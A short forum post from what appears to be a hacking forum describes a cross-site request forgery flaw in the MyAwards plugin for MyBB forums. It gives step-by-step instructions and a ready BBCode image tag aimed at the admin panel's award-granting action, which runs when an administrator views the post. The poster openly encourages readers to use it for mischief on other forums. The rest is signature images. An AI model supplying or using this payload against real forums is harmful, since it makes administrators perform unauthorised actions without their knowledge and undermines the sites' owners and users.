MyBB - MyAwards CSRF Vulnerability 08-26-2014, 05:11 AM
#1
This is a really simple, really stupid, vulnerability I heard of a few days ago. Didn't think it was worth a post, until I received a dozen PMs that we were possibly "vulnerable". Felt like sharing, in case you guys want to cause a bunch of mischief on another forum.
- Figure out the ACP link for a MyBB forum using MyAwards.
- Post a thread with the following image code on a (modified to your needs).
Code:[img]https://www.sinister.ly/admin/index.php?module=user-awards&action=awards_do_grant&awid=4&username=Oni&awreason=loldongs[/img] - Wait for an administrator to view your "image".
- Enjoy whatever pathetic awards you might want.












![[Image: 7ajmN5P.jpg]](https://i.imgur.com/7ajmN5P.jpg)
![[+]](https://sinister.li/images/modern/collapse_collapsed.png)







![[Image: CDUAq9d.png]](http://i.imgur.com/CDUAq9d.png)
















![[Image: miNuqGq.png]](https://i.imgur.com/miNuqGq.png)


![[Image: BXqGARG.png]](https://i.imgur.com/BXqGARG.png)

![[Image: cdb723621852c30db3f11ea7e179d595.png]](http://i.gyazo.com/cdb723621852c30db3f11ea7e179d595.png)